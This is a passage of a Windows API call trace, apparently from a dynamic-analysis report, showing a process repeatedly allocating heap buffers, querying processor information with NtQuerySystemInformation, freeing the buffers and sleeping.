(HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0299.468] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.468] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0299.468] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.469] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.469] Sleep (dwMilliseconds=0x110) [0299.486] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0299.486] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.486] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0299.486] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0299.486] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0299.487] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0299.487] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.488] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0299.488] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0299.488] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.488] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0299.488] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.489] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.489] Sleep (dwMilliseconds=0x110) [0299.501] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0299.501] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.502] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0299.502] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0299.502] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.503] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0299.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0299.503] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.503] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0299.504] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0299.504] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0299.505] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.505] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.505] Sleep (dwMilliseconds=0x110) [0299.513] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0299.513] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.513] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0299.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0299.518] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0299.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0299.518] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0299.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0299.519] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0299.520] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.520] Sleep (dwMilliseconds=0x110) [0299.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0299.533] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0299.534] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0299.534] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.535] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0299.535] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0299.535] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.535] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0299.535] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0299.535] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.536] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0299.536] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.536] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.536] Sleep (dwMilliseconds=0x110) [0299.544] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0299.544] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.544] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0299.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0299.548] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0299.549] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0299.549] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0299.549] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0299.549] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.550] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0299.550] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.551] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.551] Sleep (dwMilliseconds=0x110) [0299.612] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0299.612] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0299.613] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0299.613] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.613] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0299.613] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0299.613] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.614] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0299.614] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0299.614] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.614] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0299.614] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.615] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.615] Sleep (dwMilliseconds=0x110) [0299.623] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0299.623] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.623] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0299.623] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0299.624] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.624] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0299.624] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0299.624] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.625] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0299.625] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0299.625] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.625] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0299.625] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.626] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.626] Sleep (dwMilliseconds=0x110) [0299.644] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0299.644] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.645] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0299.645] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0299.645] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.645] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0299.645] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0299.645] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.646] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0299.646] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0299.646] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.646] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0299.646] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.647] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.647] Sleep (dwMilliseconds=0x110) [0299.674] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0299.674] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.674] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0299.675] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0299.675] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.675] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0299.675] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0299.675] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.676] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0299.676] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0299.676] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.677] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0299.677] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.677] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.677] Sleep (dwMilliseconds=0x110) [0299.685] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0299.685] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.686] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0299.686] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0299.686] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.687] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0299.687] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0299.687] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.687] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0299.687] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0299.687] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.688] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0299.688] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.688] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.688] Sleep (dwMilliseconds=0x110) [0299.705] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0299.705] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.706] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0299.706] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0299.706] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.707] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0299.707] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0299.707] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.707] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0299.707] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0299.707] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.708] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0299.708] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.708] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.709] Sleep (dwMilliseconds=0x110) [0299.720] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0299.720] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.721] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0299.721] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0299.721] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.721] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0299.721] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0299.721] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.722] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0299.722] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0299.722] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.722] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0299.722] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.723] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.723] Sleep (dwMilliseconds=0x110) [0299.731] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0299.731] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.732] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0299.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0299.736] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0299.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0299.736] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0299.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0299.737] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0299.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.737] Sleep (dwMilliseconds=0x110) [0299.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0299.751] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0299.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0299.752] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0299.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0299.753] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.753] HeapFree (in: 